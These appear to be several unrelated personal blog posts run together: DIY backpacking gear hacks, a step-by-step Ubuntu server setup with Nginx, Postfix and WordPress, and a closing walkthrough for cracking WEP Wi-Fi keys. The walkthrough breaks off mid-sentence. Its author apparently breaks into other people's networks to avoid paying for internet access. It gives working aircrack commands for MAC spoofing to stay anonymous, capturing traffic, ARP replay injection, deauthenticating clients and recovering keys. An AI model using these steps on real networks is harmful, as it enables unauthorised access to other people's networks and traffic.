All that’s needed is a chain tool, a bottle, some sort of degrease-ing dish soap, and water.

The process is simple. Break the chain with the chain tool and drop it into the bottle. (I use an old Gatorade bottle.) Then put in a small dollop of the soap. Fill up the bottle with water, shake it around a bit, and let it sit. The water becomes black immediately. After it has sat for about 15 minutes I’ll dump it out, rinse off the chain, and put it back into the bottle with fresh soap and water. I do this until the water stays clear, which generally takes about 3 cycles.

When it’s done, you should have a chain that’s relatively clean-ish. Dry it, toss it back on the bike, lube up, and start cruising! If the chain was really dirty, you might also want a cheap brush to scrub it down.

A water filter, of course, filters out not only the invisible nasties that upset the stomach, but also the visible things things that don’t cause much harm but aren’t altogether pleasant: dirt, dead bugs, small rocks, and the like. When I moved to using chemicals I was just dumping the water into my drinking vessel direct from the source. Without any sort of filter, the water could sometimes be a bit gritty. Too textured for my taste.

As a first attempt to solve this I started to place a bandanna over the opening of the Platypus, and then poured the source water over that. That worked great for getting out the sediment, but then I had the problem of having a wet rag. If the sun is out, it dries, but the other 307 days of the year, the bandanna — even a synthetic Buff — became a bit of a hassle to dry. I wanted some sort of pre-filter that I could get wet without worrying about it.

The solution (like more than a few before it) came while browsing the BackpackingLight forums.

A filter washer is a rubber washer with a mesh screen in the middle. Apparently they’re used in garden hoses and washing machines to remove sediment. I was able to find them easily in the plumbing section of a local hardware store.

I took an old Platypus cap and drilled out the center of it. Then, with a little Gorilla Glue, glued the filter washer onto the cap. That’s all there is to it! The new pre-filter cap weighs 2 grams (0.07 oz) and shouldn’t cost much more than $1 to make.

The downside to the pre-filter cap is that it does noticeably decrease the flow rate of the water. To fill the Platypus, I use a scoop made out of an older Platypus bottle with the top cut off. Without the pre-filter cap, it takes all of 30 seconds to fill the Platypus bottle. With the pre-filter cap, it takes something more like 2 minutes to fill up the bottle. I have to pour the water out of the scoop much more slowly. Because of this I’ll sometimes forgo using the pre-filter cap if the water looks very clean, but the majority of the time I do use the cap. It’s become a permanent addition to my pack.

Originally I addressed this by scoring the handle of my spork to mark 1, 2, and 3 cups measured in the pot — an idea which I think originally came to me from somewhere on the BackpackingLight Forums. This method works ok — though making the marks deep enough to be visible on the titanium was a bit tough with my knife — but I’ve never felt that it is very accurate. It will tell me if I have roughly 1 cup of water in the pot, but I could really be anywhere between 3/4 of a cup to 1 1/4 cups. That’s the difference between nice, fluffy couscous and overly soggy (or dry and undercooked) couscous, you know.

As a more accurate replacement, I came up with the idea for the Water Measuring Doohicky: a piece of paper with marks on it. Ingenious, isn’t it?

For the paper, I chose a cut a piece out of a page in one of my Rite in the Rain notebooks. Then I put 1/2 cup of water into the pot, set in the paper, noted the water line, took out the paper and marked the water line. This was repeated at 1/2 cup increments up to 3 cups. (The pot holds 4 cups when filled to the rim, so 3 cups is the most I would ever want to cook with.) After I had all the marks determined, I cut an identical piece of paper and put marks at the same levels. Then I tossed the soggy paper and was left with a fresh, dry piece of waterproof paper with the appropriate marks.

As a poor-man’s lamination, I wrapped it with clear packing tape. Even though the Rite in the Rain paper is waterproof, it gets a little soggy when submerged and takes a while to dry out. Water doesn’t cling to the tape at all. I can give it a shake or two after taking it out of the pot and it is immediately dry. The tape also adds a little stiffness, which helps achieve more accurate measurements.

I made two of these doohickeys at the same time, but have been using only one since last Fall. It works great. I am somewhat embarrassed it took me almost a year to come up with the idea. Even though I only made marks at 1/2 cup increments, the grid on the paper allows me to easily measure with 1/4 cup accuracy. As opposed to the marks on the spork, this paper is one extra thing to carry, but when placed on my scale it doesn’t register. I don’t think it weighs me down any.

I had done the lamination before I thought of this, but next time around I think I will write common cooking ratios on the back: water to couscous, water to dehydrated brown rice, etc. Usually I write those ratios on the ziploc freezer bags that hold my food, but the bags get replaced and rotated fairly frequently. The Water Measuring Doohickey has proved that it will last for a longer period of time.

I thought this was a neat idea, but the tri-glide fastener used in BFE’s version seemed a little cumbersome. I knew I would want some sort of quick release buckle. A traditional side release buckle would be too bulky for my tastes, particularly when the notebook is shoved in a pocket. The other thought I had was that using elastic webbing for the pen loop might increase the versatility of the strap, since it could expand to fit different sized tools.

I didn’t have any 1″ elastic webbing hanging about, but I did have some spare webbing and an old buckle from a previous project. With those two things along with a knife and my repair kit, I set out to see what I could do about whipping up some kind of strap.

My initial intention was to create the pen loop the same way as the BFE strap: cut one strap short and sew on an extension piece with a bit of an overlap. But before I got to that part, I had to sew one end of the buckle onto the webbing. In preparing to do this, I realized that I would already be sewing a loop right there. I could just pull a bit more webbing through the buckle to create my overlap, throw in a stitch to hold down the end of the webbing, another stitch closer to the buckle, and between the two I would have the perfect loop for my pen. Simple.

On the back of the notebook I created two slits for the webbing to pass in and out of, just like in the BFE hack (except I used my knife rather than a Dremel tool).

I’m happy with how this hack came out and will probably perform it on my other Rite in the Rain notebooks. The whole process takes only a few minutes and does not strain my juvenile sewing skills. My one complaint is with the buckle that I happened to choose. I appreciate the low profile, center-release design, but the male end of it doesn’t grip the webbing very well. This means that while it is adjustable, it doesn’t hold much tension, and so the buckle doesn’t snap open as much as it should when I release it. I’m thinking of sewing the webbing down on the male end of the buckle just like I did on the female end. The strap would no longer be adjustable, but I could be guaranteed the proper tension and that the buckle would open with the speed and ease which I desire. This would also present the opportunity for me to create another loop to hold a second tool. Perhaps a pencil or a highlighter to go along with the pen.

The Mora knife sheaths are designed to be mounted either on a button on a pair of coveralls or through a belt. Apparently people wear very small, skinny belts in Sweden. Over here in the United States of Gun Belts, that doesn’t fly. The belt slot on the sheath can be forcefully enlarged by shoving in a piece of wood, such as a ruler, and applying heat to cause the plastic to expand, but I don’t trust that such an act will not over weaken the plastic. I’m not a big fan of carrying a Mora directly on my belt, anyway. Usually, I’ll carry the knife either on a lanyard around my neck or as a dangler off my belt. But both of these setups allow the possibility of the knife and sheath to swing freely, accentuating the problem of an insecure fit.

Both the problem of how to carry the sheath and the problem of the insecure fit can be addressed with a single piece of paracord.

With the knife in the sheath, I take a piece of paracord and run both ends around the handle and through the slot for the belt. Then, tight against the back of the sheath, I tie an overhand knot in either end of the cord. This creates a loop of paracord on the front of the sheath that can be made smaller, but cannot become any wider than the bottom third of the handle. Because the handles on Mora knifes are somewhat tapered — fatter in the middle than on either end — this loop prevents the knife from being removed from the sheath. Even if the knife is only lightly dropped into the sheath rather than securely pressed, it cannot be removed without first sliding off the loop of paracord.

After tying the two knots against the back of the sheath in either end of the paracord, I take both ends and tie them together, forming a loop on the back of the sheath. This provides my carry options.

If I want to wear the knife around my neck, I take a pre-tied loop of paracord that I carry and loop it through itself around the loop on the sheath.

To carry the knife in a dangler system, I prefer to use a Maxpedition Keyper rather than a carabiner. The Keyper is mounted on my belt and clipped into the loop of paracord on the sheath. (To reduce movement in this setup, I’ll stick the knife and sheath in my pocket.)

The last thing that I do to this part of the sheath is add a small wrap of electrical tape around the very top, covering the upper bit of the belt loop and the button hole. This prevents the paracord from sliding to the top of the sheath and forces the securing loop to be about .75″ from the very end of the handle. I’ve found that if this is not done, the securing loop is like to slip off the handle.

That’s all that is needed to make the sheath usable, but a few other additions can be made to increase its utility.

Around the top of the sheath, I wrap tape. In the sheaths pictured here, one has 2″ olive drab duct tape, the other has 1″ black Gorilla Tape (which is like duct tape, but thicker and stickier). One can never carry enough tape. I imagine, also, that the tape likely increases the structural integrity of the sheath.

On the back of both sheaths, I have a #17 sailmaking needle, pre-threaded with black kevlar thread, taped down with some electrical tape. As I mentioned in my review of the RAT Izula, this is an idea I first picked up from one Dave Canterbury’s videos. The extra needle and thread adds no noticeable weight and could be a welcome addition to the sheath if you ever find yourself separated from your pack, with the knife and sheath as your only piece of gear.

The next modification on the body of the sheath was also inspired by Dave Cantebury. In another of his videos, he showed how he had layered different width pieces of inner-tube on a machete sheath to create pockets that could store small items, such as a sharpening stone and magnesium fire starter. With that in mind, I add a wide piece of inner-tube onto the middle of the Mora sheath (which also serves to cover and further secure the taped down needle). Then, on top of that, I put a skinnier piece of inner-tube. Slid between both pieces is a backup ferro rod. Because the rod has rubber below it and rubber atop, there is an incredible amount of friction. The ferro rod becomes difficult to remove. I have carried blank rods in these “pockets” and they have never fallen out. Still, I prefer to carry rods with a lanyard of some sort on them. I loop the rod through its lanyard around the paracord loop on the top of the sheath, guaranteeing that the rod is secured.

The sheath for my KJ #1 knife has only a ferro rod. That knife is carbon steel and can generate sparks off the spine. On the sheath for the larger SL-2, however, I have added a small striker slid between the two pieces of inner-tube on the back. The SL-2 is made of laminated steel, which is too soft to reliably produce sparks.

These modifications made to the Mora sheath help to secure the knife, allow for different carry options, guarantee a source of fire, and provide a needle, thread and tape for repairs. They turn what is otherwise a near useless sheath into a functional item worthy of being matched with the Mora blade.

(I also own a high-quality leather sheath made by JRE Industries for the KJ #1 knife. I tie a loop of paracord through the top loop of leather on the sheath so that the knife may be carried around the neck or on a dangler, similar to the modified plastic sheath. The leather sheath does not require a loop of paracord on the front to secure the handle. Nor does it need pieces of inner-tube to create a pocket for a ferro rod. The only thing that it lacks is a repair needle, but I have found that most tape does not adhere very well to leather, so I cannot stick one on the back.)

One of the pesky traits of the wooden handled Mora knives is their lack of grip when wet. One could acquire a Mora with a rubber handle, but, let’s face it: those are ugly. Instead, I cut a piece of 700×35 bicycle inner-tube about an inch wide and slide this just less than halfway on to the handle. The grip is immediately improved. If you were so inclined, you cut a piece the length of the handle and cover the whole thing, but so far it seems that this small piece is enough.

As with the rubberized BIC, this also provides another way to carry tinder that will work even when wet (though it will require a lighter or candle to start).

I thought that was a great idea. It gives you a nice, rubberized grip for the BIC and provides a simple way of always carrying waterproof tinder.

I’ve now cut off pieces from a 700×35 bicycle inner-tube and made this modification to all my lighters.

Tyvek is a synthetic material made by DuPont, most regularly used at construction sites for wrapping house frames. It is a rather strong material and fairly waterproof. It is so ubiqitous in industrial usage as to be freely available to the intrepid individual. Partly because of this, Tyvek is popular among many lightweight travelers for use as a cheap, lightweight, and effective groundcloth for a tarp shelter.

The United States Postal Service’s Priority Mail envelopes are also made out of the material. A few months ago I saw a picture of one of these envelopes in use as a stuff sack. I thought it was a great idea and decided to make my own. I’ve since made two of them. It’s a very simple process.

You need only a few items for the project: a USPS Priority Mail envelope, a needle and thread (from the repair kit in your trusty possibles pouch, no doubt), a bit of cord, a cordlock, and a sharp object. You could make the needed cuts with a knife, but scissors are a bit easier. I use the pair on my Leatherman Juice S2, which has replaced the Charge ALX as my daily carry.

The envelope can be new or used. Any post office will have new envelopes available in the lobby, free for the taking. Still, I would feel a little guilty about taking a brand new envelope just for this purpose. There’s plenty enough used envelopes floating around, and it seems a waste to steal a brand new one. I lucked out in that recently someone sent me a package in a box, but, within the box, used the pictured envelope to organize the goods. So the envelope is used, but brand new.

This project also warrants a disclaimer: Priority Mail envelopes, whether new or used, are property of the United States Postal Service. They are intended solely for the use of the postal system and, contrary to logic, just because somebody paid to mail you a package in one doesn’t make it yours (or theirs). So repurposing the envelope in this way is probably a federal offense. Law abiding citizens should immediately navigate away from this page and return to their cells. The rest of us can move on.

The first step in the process is to cut a little square in one corner of the open end of the envelope. No need to measure. Just eyeball whatever looks good. The height of the square will determine the size of the channel which we will sew and then pass the cord through (this one happened to be about 1.5mm).

If you are using a brand new envelope, you’ll want to cut the top bit with the sticky stuff off, so that both sides of the envelope are the same height. On a used envelope, you might have to do some trimming to achieve the same thing, depending on how you opened the envelope.

After the square is cut, fold down the rim of the envelope all the way around, using the height of the square to determine how much is folded. If you want, you can cut a slit in the other corner of the envelope to help fold it down. I did this on the first stuff sack. For this one, I chose not to. There’s a slight bit of bunching in that corner as a result, but it’s fine.

Now that you have the top flap folded down all along the top of the envelope, sew it shut. This creates a channel which we may then thread a bit of cord through, using it to cinch the sack shut.

I start my stitching on the inside of the envelope, poke the needle through, and pull all the thread through except for a tag of about 3″. Then I poke the needle back through in another hole, pull all the thread through back to the inside, and use the tag end of the thread to tie a square knot, thus securing my first stitch.

After that, stitch your way around till the channel is sewn shut and tie off the end of the thread in whatever way you see fit. I’m a pretty poor sewer and am physically and mentally challenged when it comes to knots, which always makes for an interesting end to my stitches.

With the sewing done, now would be a good time for the camera battery to die. Curse a little, perhaps shed a tear, then decide that your audience is intelligent enough to struggle through the next steps without pictures.

For this stuff sack, I used ALSE survival vest cord, also known as accessory cord or Type I paracord. This stuff has a breaking strength of 100 lbs, is 1/16 of an inch in diameter, and tips the scale at 1oz per 50 feet. Pick it up at Supply Captain. You could use any cord you happen to have, including the standard (Type III) 550 paracord, but I don’t think the cord on this little stuff sack needs to have a breaking strength of 550lbs and Type III paracord is much, much heaver than Type I. We’re trying to go lightweight here.

If you don’t have any cordlocks lying around, these can also be got from the Captain.

Threading the cord through the channel can require a little perseverance. I usually tie a knot in one end, stick it in, and then use the knot to push the cord along with my fingers from the outside. If need be, you can shove a skinny stick or something in there to help it along.

When the cord comes out the other side, all that’s left is to cut it to length, slide the cordlock over both ends, tie some sort of knot so that the cordlock can’t be inadvertently slide off the cord, and you’re done!

The resulting stuff sack is durable, lightweight, and free (or close to it, depending on what materials you have in your craft box). Though you’re obviously not going to get a water-tight seal by cinching the sack closed, the Tyvek material itself is waterproof and will suffice to keep your gear organized and dry in any pack. If water crossings and momentary submersion is a concern, use a trash bag as a liner in your pack and you will be very well off for almost no cost in weight or money.

Lighter, stronger, more waterproof, and better constructed stuff sacks can of course be purchased, but for an exponentially higher price. I have nice stuff sacks for my sleeping bag and spare clothes, so, for the time being, this Tyvek stuff sack is used for my food.

March 2010 Update:

Check out the new version of this tutorial on ITS Tactical.

Protocol 2
PermitRootLogin no
AllowUsers demo
X11Forwarding no
PasswordAuthentication no

Allowing connections from only specified IP addresses would be accomplished by adding something like the following to /etc/hosts.deny:

sshd: ALL # Deny all by default
sshd: 192.168.1.0/255.255.255.0 # Allow this subnet
sshd: 4.2.2.1 # Allow this IP

But the last two options (disabling password auth and allowing only certain IP addresses) limits mobility. I constantly login to my slice from multiple IPs, and I also need to login during travel when I may or may not have my key on me.

The main thing these two options protect against is a brute force attack. By allowing password logins from any IP, we give the attacker the ability to exploit the weakest part of SSH. This is where DenyHosts comes in.

DenyHosts is a python script which attempts to recognize and block brute force attacks. It has many attractive features and is included in the default Ubuntu repositories.

$ sudo aptitude install denyhosts

The config file is located at /etc/denyhosts.conf. It is very simply and readable. I recommend reading through it, but most of the default options are acceptable. If any changes are made, the daemon must be restarted:

$ sudo /etc/init.d/denyhosts restart

Note: Many people also advocating changing SSH’s default port to something other than 22 (more specifically, something over 1024, which won’t be scanned by default by nmap). The argument in support of this is that many automated attack scripts look for SSH only on port 22. By changing the port, you save yourself the headache of dealing with script kiddies. Opponents to changing the port would argue that the annoyance of having to specify the port number whenever using ssh or scp outweighs the minute security benefits. It’s a heated argument. I lean toward leaving SSH on the default port.

I prefer to install WordPress via Subversion, which makes updating easier. We’ll have to install Subversion on the server first:

$ sudo aptitude install subversion

After that, the WordPress Codex has a guide to the rest of the install.

Nothing further is needed, unless you want fancy rewrites. In that case, we’ll have to make a change to your Nginx vhost config at /etc/nginx/sites-available/mydomain.com. Add the following to your server block under location / {:

# wordpress fancy rewrites
  if (-f $request_filename) {
            break;  
        }       
        if (-d $request_filename) {
            break;  
        }       
        rewrite ^(.+)$ /index.php?q=$1 last;

While we’re here, I usually tell Nginx to cache static files by adding the following right above the location / { block:

# serve static files directly
location ~* ^.+\.(jpg|jpeg|gif|png|ico|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|txt|tar|mid|midi|wav|bmp|rtf|css)$ {
    root  /home/user/public_html/mydomain.com/public;
    expires 7d;
    break;
}

That’ll go in the https server section, too. Now, enable rewrites in your WordPress config. I use the following “custom” structure:

/%year%/%monthnum%/%day%/%postname%/

Then, restart Nginx:

$ sudo /etc/init.d/nginx restart

And there you have it! You know have a working, new web server and mail server.

(Previously, we did a basic setup, installed a web server, and installed a mail server.)

Last week I moved this domain’s email to Google Apps. Slicehost has a guide to creating MX records for Google Apps. I have a couple other domains with Google Apps, along with a couple domains hosted locally with addresses that simply forward to my primary, Google hosted, email. I also need to send mail from the server. To accomplish all of this, I use Postfix.

Installing Postfix is a simple matter. Telnet is used quite a bit for testing, so I install that too:

$ sudo aptitude install postfix telnet

The Postfix setup will ask how it should be installed — we want the “Internet Site” option — and then ask you for your fully qualified domain name.

Done? Let’s make sure Postfix is running:

$ telnet localhost 25

If it’s working Postfix should return:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 localhost ESMTP Postfix (Ubuntu)

Let’s send a test message from root to the user account user (replace that with whatever your standard user is):

ehlo localhost
mail from: root@localhost
rcpt to: user@localhost
data
Subject: Test

Hi, is this thing on?

.
quit 

Now, check your email as user by running mail. See the message? Good.

Open /etc/postfix/main.cf to make sure that Postfix knows what domains it’s receiving mail for. To do this, edit the mydestination variable to include all the proper domains. For me, the name of my server looks like server.mydomain.com. I want Postfix to accept mail for that domain, but not for mydomain.com (since that’s being handled by Google Apps), so mine looks like:

mydestination = server.mydomain.com, localhost.mydomain.com , localhost

Restart Postfix if you made any changes:

$ sudo /etc/init.d/postfix restart

Right. Now let’s send another test. Notice this time we’re using full domain names, instead of localhost:

$ telnet server.mydomain.com 25
ehlo server.mydomain.com
mail from: root@server.mydomain.com
rcpt to: user@server.mydomain.com
data
Subject: domains!
woot... I think this works.
.
quit

Working? Good.

Let’s test from the outside. The first step is to open up the correct ports in the firewall. Assuming you have iptables configured in the way the Slicehost article suggests, open up your /etc/iptables.test.rules and add the following:

# Allow mail server connections
## SMTP
-A INPUT -p tcp -m state --state NEW --dport 25 -j ACCEPT 

Now let’s apply the rules:

$ sudo iptables-restore < /etc/iptables.test.rules

Make sure everything looks dandy:

$ sudo iptables -L

If it meets your fancy, save the rules:

$ sudo -i
$ iptables-save > /etc/iptables.up.rules

And now, from your local computer, let's test it out.

$ telnet server.mydomain.com 25
ehlo server.mydomain.com
mail from: root@server.mydomain.com
rcpt to: user@server.mydomain.com
data
Subject: remote connection test
Hello, you.
.
quit

Now check your mail on the mail server as before. Once again, everything should be working.

Now we need to setup a virtual domain. Remember, I don't want any virtual users. I only want aliases at a virtual domain to forward to my primary email address. That makes this relatively simple. (Be very, very happy. You should have seen this guide before, when I was still hosting virtual domains with virtual users!) Open up /etc/postfix/main.cf and add the following:

virtual_alias_domains = myvirtualdomain.com
virtual_alias_maps = hash:/etc/postfix/virtual

Create the /etc/postfix/virtual file referenced above and add the aliases:

alias@myvirtualdomain.com       user@mydomain.com

Turn it into a database:

$ cd /etc/postfix
$ sudo postmap virtual

Restart Postfix:

$ sudo /etc/init.d/postfix restart

Attempt to send an email to the new alias at the virtual domain:

$ telnet server.mydomain.com 25
ehlo server.mydomain.com
mail from: root@server.mydomain.com
rcpt to: alias@myvirtualdomain.com
data
Subject: virtual domain test
I hope this works!
.
quit

The message should now be in your primary email inbox!

As long as we're setting up forwards, let's forward system account mail to somewhere where it'll actually get read. To do so, create a ~/.forward file with the following contents:

user@mydomain.com

Let's also create a /root/.forward, so that roots mail gets forwarded to my local account (where it is then forwarded to my primary email). Root's forward would simply read:

user

Next up: install WordPress with rewrites. (Previously, we did a basic setup and installed a web server.)

Now we’ve got a properly configured, but idle, box. Let’s do something with it.

Nginx is a small, lightweight web server that’s all the rage on some small corners of the Net. Apache is extremely overkill for a small personal web server like this and, since we’re limited to 256MB of RAM on this VPS, it quickly becomes a resource hog. Lighttpd is another small, lightweight web server, but I’m a fan of Nginx. Try it out.

First, we need to install the web server. Nginx is now in Ubuntu’s repositories:

$ sudo aptitude install nginx

That’s all it takes in Hardy, but if you really want a guide for it, Slicehost has you covered.

Slicehost has a few more useful guides to Nginx, including introductions to the config layout and how to get started with vhosts:

• Nginx configuration
• Nginx Virtual Hosts
• Nginx virtual host settings

Next up, we’ll need to install MySQL and PHP, and get them working with Nginx.

Slicehost has a guide for installing MySQL and Ruby on Rails, which also includes suggestions on optimizing MySQL. I follow the MySQL part of the guide, stopping at “Ruby on Rails install”.

Now MySQL is working, lets install PHP:

$ sudo aptitude install php5-common php5-cgi php5-mysql php5-cli

To get PHP as FastCGI working with Nginx, we first have to spawn the fcgi process. There are a few different ways to do that. Personally, I use the spawn-fci app from lighttpd. To use it, we’ll compile and make lighttpd, but not install it. We’re only after one binary.

Lighttpd has a few extra requirements, so let’s install those:

$ sudo aptitude install libpcre3-dev libbz2-dev 

Now, download the source and compile lighttpd. Then copy the spawn-fci binary to /usr/bin/:

$ wget http://www.lighttpd.net/download/lighttpd-1.4.19.tar.gz
$ tar xvzf lighttpd-1.4.19.tar.gz
$ cd lighttpd-1.4.19
$ ./configure
$ make
$ sudo cp src/spawn-fcgi /usr/bin/spawn-fcgi

Then, create a script to launch spawn-fci (I call it /usr/bin/php5-fastcgi):

#!/bin/sh
/usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u www-data -C 2 -f /usr/bin/php5-cgi

The script tells spawn-fcgi to launch a fastcgi process, listening on 127.0.01:9000, owned by the web user, with only 2 child processes. You may want more child processes, but I’ve found 2 to be optimal.

Give the script permissions:

$ sudo chmod +x /usr/bin/php5-fastcgi

I then link the script filename to a version-neutral, err, version:

$ sudo ln -s /usr/bin/php5-fastcgi /usr/bin/php-fastcgi

Now we need an init script to start the process at boot. I use this one from HowToForge, named /etc/init.d/fastcgi:

#!/bin/bash
PHP_SCRIPT=/usr/bin/php-fastcgi
RETVAL=0
case "$1" in
  start)
    echo "Starting fastcgi"
    $PHP_SCRIPT
    RETVAL=$?
  ;;
  stop)
    echo "Stopping fastcgi"
    killall -9 php5-cgi
    RETVAL=$?
  ;;
  restart)
    echo "Restarting fastcgi"
    killall -9 php5-cgi
    $PHP_SCRIPT
    RETVAL=$?
  ;;
  *)
    echo "Usage: php-fastcgi {start|stop|restart}"
    exit 1
  ;;
esac      
exit $RETVAL

Give it permissions:

$ sudo chmod 755 /etc/init.d/fastcgi

Start it:

$ sudo /etc/init.d/fastcgi start

Have it start at boot:

$ sudo update-rc.d fastcgi defaults

Alright, now that PHP is running how we want it to, let’s tell Nginx to talk to it. To do that, add the following to your vhost server block in /etc/nginx/sites-available/mydomain.com, making sure to change the SCRIPT_FILENAME variable to match your directory structure:

location ~ \.php$ {

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /home/user/public_html/mydomain.com/public$fastcgi_script_name;
    include        /etc/nginx/fastcgi.conf;
        
        }

Now let’s create that /etc/nginx/fastcgi.conf file that’s being included above. As per the Nginx wiki article, mine looks like this:

fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
fastcgi_param  SERVER_SOFTWARE    nginx;
fastcgi_param  QUERY_STRING       $query_string;
fastcgi_param  REQUEST_METHOD     $request_method;
fastcgi_param  CONTENT_TYPE       $content_type;
fastcgi_param  CONTENT_LENGTH     $content_length;
fastcgi_param  REQUEST_URI        $request_uri;
fastcgi_param  DOCUMENT_URI       $document_uri;
fastcgi_param  DOCUMENT_ROOT      $document_root;
fastcgi_param  SERVER_PROTOCOL    $server_protocol;
fastcgi_param  REMOTE_ADDR        $remote_addr;
fastcgi_param  REMOTE_PORT        $remote_port;
fastcgi_param  SERVER_ADDR        $server_addr;
fastcgi_param  SERVER_PORT        $server_port;
fastcgi_param  SERVER_NAME        $server_name;

Then restart Nginx:

$ sudo /etc/init.d/nginx restart

Let’s create a file named test.php in your domain’s public root to see if everything is working. Inside, do something like printing phpinfo.

Go to http://mydomain.com/test.php. See it? Good. If you get “no input file specified” or somesuch, you broke something.

If you create an index.php, and delete any index.html or index.htm you might have, you’ll notice Nginx throws a 403 Forbidden error. To fix that, find the line in your vhost config (/etc/nginx/sites-available/mydomain.com) under the location / block that reads index index.html; and change it to index index.php index.html;. Then restart Nginx.

If you want SSL with your Nginx, Slicehost has a guide for generating the certificate and another guide for installing it.

You’ll want to install OpenSSL first:

$ sudo aptitude install openssl

There is one bug in the second guide. In the first server module listening on port 443, which forwards www.domain1.com to domain1.com, the rewrite rule specifies the http protocol. So, in effect, what that rule does is forward you from a secure domain to unsecure: https://www.domain1.com to http://domain1.com. We want it to forward to a secure domain. Simply change the rewrite rule like thus:

rewrite ^/(.*) https://domain1.com permanent;

Next up: install a mail server. (Previously, we did a basic setup.)

Slicehost has an excellent article repository, containing guides on a number of subjects. After building a fresh Slice, you should first follow Part 1 and Part 2 of Slicehost’s basic setup articles.

I use slightly different coloring in my bash prompt, so, rather than what Slicehost suggests in their article, I add the following to ~/.bashrc:

export PS1='\[\033[0;32m\]\u@\[\033[0;35m\]\h\[\033[0;33m\] \w\[\033[00m\]: '

This is a good time to protect SSH by installing DenyHosts, which I discuss here:

$ sudo aptitude install denyhosts

Ubuntu’s default text editor is nano, which I abhor. Real men use vim. Ubuntu comes with a slimmed down version of vim, but you’ll probably want the full version:

$ sudo aptitude install vim

To change the global default editor variable, execute the following and select the editor of your choice:

$ sudo update-alternatives --config editor

This is also a perfect time to install GNU Screen.

$ sudo aptitude install screen

If you’re not familiar with Screen, Red Hat Magazine has a nice little introduction

My .screenrc looks like this:

# Print a pretty line at the bottom of the screen
hardstatus alwayslastline
hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{=kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{Y}%Y-%m-%d %{W}%c %{g}]'

# Nobody likes startup messages
startup_message off

# Turn visual bell on and set the message to display for only a fraction of a second
vbell on
vbellwait .3

# Set default shell title to blank
shelltitle ''

# Gimme my scrollback!
defscrollback 5000

# Change command character to backtick
escape `` 

# Stop programs (live vim) from leaving their contents
# in the window after they exit
altscreen on

# Default screens
screen -t shell 0 

I prefer to have my bash profile setup to connect me to Screen as soon as I login. If there are no running sessions, it will create one. If there is a current session, it will disconnect the session from wherever it is connected and connect it to my login. When I disconnect from screen, it automatically logs me out. To achieve this, I add the following to ~/.bashrc:

# If possible, reattach to an existing session and detach that session
# elsewhere. If not possible, create a new session.
if [ -z "$STY" ]; then
    exec screen -dR
fi

I would also recommend following Slicehost’s guide to installing chkrootkit and rkhunter.

One more thing: let’s set the timezone of the server to whatever is local to you (Slicehost’s Ubuntu image defaults to UTC). To do that, run:

$ sudo dpkg-reconfigure tzdata

Next up: install a web server.

But there was another problem, in addition to WEP: during reconnaissance, I would rarely pick up any connected clients. Perhaps I was always trying at the wrong time of day. Or perhaps people pay for internet access and never use it. Regardless, it would have taken weeks of constant logging to gather enough IVs to crack the WEP key. So, the first step was to take the money I had saved by canceling my order with the ISP, and invest in a new wireless card that supported packet injection.

The Proxim 8470-WD (from aircrack-ng’s recommended list) caught my eye, though it took a while before I could find it a decent price. To do my initial cracking, I popped in Backtrack and followed aircrack-ng’s newbie guide. (I had upgraded my trusty old Auditor cd to Backtrack just for this occasion. It’s quite the nice distribution.) Within about 5 minutes, I had gained access to the first network. Goes to show how secure WEP is.

Though the Proxim card is plug and play in Ubuntu, the steps to crack WEP are a little different. Here’s what I do (note that I do recommend using Backtrack, instead).

First, of course, one must install aircrack:

sudo apt-get install aircrack

You may change your mac address manually, or, if you aren’t concerned with anonymity, don’t change it all. I have a preference of using the macchanger tool:

sudo apt-get install macchanger

Set your card’s MAC address randomly. In this case, the network device is at ath0:

sudo ifconfig ath0 down
sudo macchanger -r ath0
sudo ifconfig ath0 up

Put your card into monitor mode:

sudo iwconfig ath0 mode monitor

Start scanning:

sudo airodump ath0 dump 0

In this case, dump is the file prefix for airodump’s output and the 0 tells airodump to channel-hop. Now you want to pick your target network from the scan. It should have at least one client connected (displayed at the bottom of airodump’s output), the more the merrier. (Hopefully that client is transmitting data, too.)

When you pick your target, kill the first instance of airodump and start it up again, this time specifying the channel of your target:

sudo airodump ath0 targetdump 9

The targetdump is the file prefix and 9 is the channel. Optionally you can add a 1 to the end of the command, which tells airodump to only capture IVs (which is what you’re after). I normally don’t bother.

When you’ve captured somewhere in the range of 250,000 – 500,000 data packets (shown by airodump in the “Packets” column of your target client), you can start cracking:

aircrack -b 00:12:34:45:78:A3 targetdump.cap

In this case, -b is the essid of your target network. Cracking could take minutes, hours, days, weeks, months, or years. I’ve never had to wait over 20 minutes.

But what if the client is being a party-pooper and not transmitting? That’s where packet injection comes in. From aircrack’s guide:

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).

You’ll want to keep airodump running, so that all the traffic you generate will be captured. In another terminal, start injecting:

sudo aireplay -3 -b 00:12:34:45:78:A3 -h A3:78:45:34:12:00 ath0

The -3 tells airepay you want to replay ARP requests, -b is that target network, and -h is the client. In a little bit, aireplay should inform you that it has captured 1 (or more) ARP packets. Sit back and watch airodump count up the IVs.

If that pesky client still isn’t cooperating, you can give it a little motivation. From aircrack:

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID during reconnection too. This comes in handy if the ESSID of your target is hidden.

…the risk that someone recognizes this attack or at least attention is drawn to the stuff happening on the WLAN is higher than with other attacks.

Keep airodump and aireplay running, and in a new terminal give it a little kick in the butt:

sudo aireplay -0 5 -a 00:12:34:45:78:A3 -c A3:78:45:34:12:00 ath0

The first switch, -0, informs aireplay you want to force the client to be unauthenticated, -a is the target network, -c is the target client. When the client reconnects, you should start grabbing ARP requests.

After you have enough packets, crack the WEP key as before.

To manage and connect to my wireless networks, I’ve taken to using wifi-radar. It scans for networks, allows you to specify which networks you prefer and, for each network, allows you to set preferences such as the WEP key, whether to use dynamic or static addresses, and the like. What I like best is the connection commands, which allows you to set commands you want executed before wifi-radar connects to the network, and after. In the before field, I have it randomly change my mac address:

